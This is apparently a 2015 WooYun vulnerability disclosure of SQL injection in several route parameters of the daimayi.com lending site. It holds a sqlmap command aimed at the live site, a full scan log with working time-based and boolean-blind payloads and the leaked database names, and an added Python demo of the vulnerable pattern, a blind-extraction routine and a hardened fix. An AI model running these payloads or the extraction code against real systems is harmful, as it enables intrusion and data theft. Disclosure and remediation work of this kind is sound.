
Vulnerability summary

Defect ID: wooyun-2015-0151941

Title: Multiple parameters on the 贷蚂蚁 (daimayi.com) main site are vulnerable to SQL injection (DBA privileges)

Vendor: daimayi.com

Author: 路人甲

Submitted: 2015-11-05 08:54

Fix time: 2015-11-10 08:56

Published: 2015-11-10 08:56

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-05: Details sent to the vendor; awaiting vendor response
2015-11-10: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

I searched, and these haven't been submitted before, have they? Hopefully not another duplicate ID. I've lost confidence in submitting for this site!~~~ Multiple parameters have injection points!~~~

Detailed description:

URL:

sqlmap.py -u "http://daimayi.com/index.php/Loan/index/s/1*/money/1*/deadline/3*/lt/1*/co_id/1*" --threads 10 --dbms "MySQL"


The numbers after money, deadline, lt and co_id are injectable (the first marker, on s, is not; see the log).
sqlmap run:

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[00:21:43] [INFO] testing connection to the target URL
[00:21:48] [INFO] testing if the target URL is stable. This can take a couple of seconds
[00:21:53] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[00:21:55] [INFO] testing if URI parameter '#1*' is dynamic
[00:21:59] [WARNING] URI parameter '#1*' does not appear dynamic
[00:22:04] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[00:22:04] [INFO] testing for SQL injection on URI parameter '#1*'
[00:22:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:23:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:23:58] [INFO] testing 'MySQL inline queries'
[00:24:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:24:02] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[00:24:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:25:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:31:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:37:26] [WARNING] URI parameter '#1*' is not injectable
[00:37:26] [INFO] testing if URI parameter '#2*' is dynamic
[00:37:31] [INFO] confirming that URI parameter '#2*' is dynamic
[00:37:35] [INFO] URI parameter '#2*' is dynamic
[00:37:36] [WARNING] heuristic (basic) test shows that URI parameter '#2*' might not be injectable
[00:37:36] [INFO] testing for SQL injection on URI parameter '#2*'
[00:37:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:37:38] [WARNING] reflective value(s) found and filtering out
[00:38:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:38:15] [INFO] testing 'MySQL inline queries'
[00:38:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:38:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:39:31] [INFO] URI parameter '#2*' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[00:39:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:39:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:40:26] [INFO] checking if the injection point on URI parameter '#2*' is a false positive
URI parameter '#2*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[00:43:18] [INFO] testing if URI parameter '#3*' is dynamic
[00:43:23] [INFO] confirming that URI parameter '#3*' is dynamic
[00:43:28] [INFO] URI parameter '#3*' is dynamic
[00:43:29] [WARNING] heuristic (basic) test shows that URI parameter '#3*' might not be injectable
[00:43:29] [INFO] testing for SQL injection on URI parameter '#3*'
[00:43:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:43:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:44:10] [INFO] testing 'MySQL inline queries'
[00:44:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:44:24] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:45:25] [INFO] URI parameter '#3*' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[00:45:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:45:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:46:18] [INFO] checking if the injection point on URI parameter '#3*' is a false positive
URI parameter '#3*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[00:54:38] [INFO] testing if URI parameter '#4*' is dynamic
[00:54:42] [INFO] confirming that URI parameter '#4*' is dynamic
[00:54:47] [INFO] URI parameter '#4*' is dynamic
[00:54:48] [WARNING] heuristic (basic) test shows that URI parameter '#4*' might not be injectable
[00:54:48] [INFO] testing for SQL injection on URI parameter '#4*'
[00:54:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:55:08] [INFO] URI parameter '#4*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[00:55:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:55:09] [INFO] testing 'MySQL inline queries'
[00:55:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:55:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:56:15] [INFO] URI parameter '#4*' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[00:56:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:56:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
URI parameter '#4*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[00:58:24] [INFO] testing if URI parameter '#5*' is dynamic
[00:58:31] [INFO] confirming that URI parameter '#5*' is dynamic
[00:58:36] [INFO] URI parameter '#5*' is dynamic
[00:58:43] [WARNING] heuristic (basic) test shows that URI parameter '#5*' might not be injectable
[00:58:43] [INFO] testing for SQL injection on URI parameter '#5*'
[00:58:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:59:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:59:56] [INFO] testing 'MySQL inline queries'
[01:00:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:00:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:01:16] [INFO] URI parameter '#5*' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[01:01:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[01:01:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:02:09] [INFO] checking if the injection point on URI parameter '#5*' is a false positive
URI parameter '#5*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 470 HTTP(s) requests:
---
Place: URI
Parameter: #2*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1 AND SLEEP(5)/deadline/3/lt/1/co_id/1

Place: URI
Parameter: #5*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/lt/1/co_id/1 AND SLEEP(5)

Place: URI
Parameter: #4*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/lt/1 AND 4532=4532/co_id/1

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/lt/1 AND SLEEP(5)/co_id/1

Place: URI
Parameter: #3*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3 AND SLEEP(5)/lt/1/co_id/1
---
there were multiple injection points, please select the one to use for following injections:
[0] place: URI, parameter: #2*, type: Unescaped numeric (default)
[1] place: URI, parameter: #3*, type: Unescaped numeric
[2] place: URI, parameter: #4*, type: Unescaped numeric
[3] place: URI, parameter: #5*, type: Unescaped numeric
[q] Quit
> 0
[01:06:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11




available databases [8]:
[*] daimayi
[*] huomayi
[*] information_schema
[*] mayishequ
[*] mysql
[*] myxd
[*] performance_schema
[*] test


sqlmap.py -u "http://daimayi.com/index.php/Loan/index/s/1*/money/1*/deadline/3*/lt/1*/co_id/1*" --threads 1 --dbms "MySQL" --current-db --current-user --is-dba --time-sec 60

Since this is time-based injection it is really too slow, so I didn't continue!

Proof of vulnerability:

As above.

Fix:

Filter the input. The injected values are numeric route segments (money, deadline, lt, co_id), so rejecting anything that is not an integer before it reaches the query, and binding the values as query parameters rather than concatenating them, closes every injection point listed above.
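The pattern the sqlmap output points at (route values concatenated into a WHERE clause), the fix described above, and the reason blind extraction costs so many requests, as an added Python example. This is not the report's code and not daimayi.com's code: ThinkPHP-style PATHINFO routing is assumed from the URL shape, sqlite3 stands in for MySQL, and the loan table, the secrets table and the value stored in it are constructed for the demo.

```python
"""Added example, not code from the WooYun report or from daimayi.com.

Models a ThinkPHP-style PATHINFO route of the shape the report targets
(/index.php/Loan/index/s/1/money/1/deadline/3/lt/1/co_id/1) with the route
values concatenated straight into SQL, beside a hardened handler. sqlite3
stands in for MySQL (unicode()/substr() replace ORD()/MID()); the loan and
secrets tables and their rows are constructed for the demo.
"""
import re
import sqlite3

SAMPLE_PATH = "/index.php/Loan/index/s/1/money/1/deadline/3/lt/1/co_id/1"


def parse_pathinfo(path: str) -> dict:
    """Map /index.php/<module>/<action>/k1/v1/k2/v2/... to {k1: v1, ...}.

    The path is assumed already URL-decoded (what the framework hands the
    controller), so 'lt/1 AND 4532=4532' arrives with its space intact.
    The key/value pairing is the assumed ThinkPHP PATHINFO convention."""
    parts = [p for p in path.split("/") if p]
    if parts and parts[0] == "index.php":
        parts = parts[1:]
    kv = parts[2:]  # skip module and action
    return dict(zip(kv[0::2], kv[1::2]))


def build_db() -> sqlite3.Connection:
    """Constructed schema: a loan listing plus a table the search must never reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE loan (id INTEGER, money INTEGER, deadline INTEGER,
                           lt INTEGER, co_id INTEGER, title TEXT);
        INSERT INTO loan VALUES (1, 1, 3, 1, 1, 'loan-a');
        INSERT INTO loan VALUES (2, 1, 3, 1, 2, 'loan-b');
        INSERT INTO loan VALUES (3, 5, 6, 2, 1, 'loan-c');
        CREATE TABLE secrets (name TEXT, value TEXT);
        INSERT INTO secrets VALUES ('admin_pw_hash', 'e10adc');
    """)
    return conn


def vulnerable_query(conn: sqlite3.Connection, params: dict) -> list:
    """The anti-pattern behind the sqlmap findings: route values pasted into
    the WHERE clause unchanged, so 'lt/1 AND SLEEP(5)' becomes SQL."""
    sql = ("SELECT title FROM loan WHERE money=%s AND deadline=%s AND lt=%s AND co_id=%s"
           % (params["money"], params["deadline"], params["lt"], params["co_id"]))
    return [row[0] for row in conn.execute(sql)]


INT_RE = re.compile(r"[0-9]{1,10}")


def hardened_query(conn: sqlite3.Connection, params: dict) -> list:
    """Two independent controls: every route value must be a plain integer
    (rejected before any SQL exists otherwise) and is bound, not interpolated."""
    values = []
    for key in ("money", "deadline", "lt", "co_id"):
        raw = params.get(key, "")
        if INT_RE.fullmatch(raw) is None:
            raise ValueError(f"parameter {key!r} must be an integer, got {raw!r}")
        values.append(int(raw))
    sql = "SELECT title FROM loan WHERE money=? AND deadline=? AND lt=? AND co_id=?"
    return [row[0] for row in conn.execute(sql, values)]


def boolean_blind_extract(conn: sqlite3.Connection, subquery: str, max_len: int = 32):
    """Recover the scalar result of `subquery` through the vulnerable handler
    from nothing but the rows / no-rows difference, the way sqlmap's
    boolean-based blind technique works. Returns (value, request_count)."""
    requests = 0

    def oracle(condition: str) -> bool:
        nonlocal requests
        requests += 1
        path = SAMPLE_PATH.replace("/lt/1/", f"/lt/1 AND ({condition})/")
        return len(vulnerable_query(conn, parse_pathinfo(path))) > 0

    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # binary-search the code point; 0 (NULL past the end) stops
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"coalesce(unicode(substr(({subquery}),{pos},1)),0) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        recovered += chr(lo)
    return recovered, requests


if __name__ == "__main__":
    db = build_db()
    probe = SAMPLE_PATH.replace("/lt/1/", "/lt/1 AND 4532=4533/")
    print("normal:", vulnerable_query(db, parse_pathinfo(SAMPLE_PATH)),
          "false probe:", vulnerable_query(db, parse_pathinfo(probe)))
    print(boolean_blind_extract(db, "SELECT value FROM secrets WHERE name='admin_pw_hash'"))
```

The extraction loop spends seven requests per character (a binary search over 128 code points) plus seven more to detect the end of the string; with a time-based oracle every "true" answer additionally waits the full --time-sec, which is the slowness the report ran into with --time-sec 60. The hardened handler refuses the same probe path before any SQL is built, and binding the values means a value that somehow passed the check still could not change the query's structure.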

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-11-10 08:56

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None